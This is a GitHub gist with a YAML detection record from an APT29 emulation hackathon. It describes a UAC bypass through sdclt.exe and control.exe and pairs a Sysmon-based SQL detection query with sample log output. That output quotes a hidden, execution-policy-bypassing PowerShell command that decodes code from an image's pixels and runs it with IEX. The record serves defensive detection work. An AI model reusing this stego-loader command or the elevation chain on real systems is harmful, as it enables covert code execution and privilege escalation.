Last active
June 11, 2020 20:18
-
-
Save Cyb3rWard0g/a5c01cd4d5764fd09a017ee19a873be5 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
vendor: OTR Community | |
step: 3.B.2 | |
procedure: Executed elevated PowerShell payload | |
criteria: High integrity powershell.exe spawning from control.exe (spawned from sdclt.exe) | |
technique: | |
name: Bypass User Account Control | |
id: T1088 | |
issue: https://github.com/OTRF/detection-hackathon-apt29/issues/6 | |
detections: | |
- main_type: Telemetry | |
modifier_type: | |
description: Telemetry showed sdclt.exe being spawned as a high integrity process and control.exe creating a high integrity powershell.exe. | |
reference: | |
queries: | |
- id: 6C8780E9-E6AF-4210-8EA0-72E9017CEE7D | |
data_sources: | |
- event_provider: Microsoft-Windows-Sysmon/Operational | |
event_logs: | |
- 1 | |
rule_contribution: | |
logic: | | |
SELECT Message | |
FROM apt29Host a | |
INNER JOIN ( | |
SELECT ProcessGuid | |
FROM apt29Host | |
WHERE Channel = "Microsoft-Windows-Sysmon/Operational" | |
AND EventID = 1 | |
AND LOWER(Image) LIKE "%control.exe" | |
AND LOWER(ParentImage) LIKE "%sdclt.exe" | |
) b | |
ON a.ParentProcessGuid = b.ProcessGuid | |
WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational" | |
AND a.EventID = 1 | |
AND a.IntegrityLevel = "High" | |
output: | | |
Process Create: | |
RuleName: - | |
UtcTime: 2020-05-02 02:58:44.325 | |
ProcessGuid: {47ab858c-e1e4-5eac-b803-000000000400} | |
ProcessId: 2976 | |
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | |
FileVersion: 10.0.18362.1 (WinBuild.160101.0800) | |
Description: Windows PowerShell | |
Product: Microsoft® Windows® Operating System | |
Company: Microsoft Corporation | |
OriginalFileName: PowerShell.EXE | |
CommandLine: "PowerShell.exe" -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\pbeesly\Downloads\monkey.png');$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))" | |
CurrentDirectory: C:\windows\system32\ | |
User: DMEVALS\pbeesly | |
LogonGuid: {47ab858c-dabe-5eac-812e-370000000000} | |
LogonId: 0x372E81 | |
TerminalSessionId: 2 | |
IntegrityLevel: High | |
Hashes: SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481 | |
ParentProcessGuid: {47ab858c-e1e3-5eac-b603-000000000400} | |
ParentProcessId: 4892 | |
ParentImage: C:\Windows\System32\control.exe | |
ParentCommandLine: "C:\Windows\System32\control.exe" /name Microsoft.BackupAndRestoreCenter |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment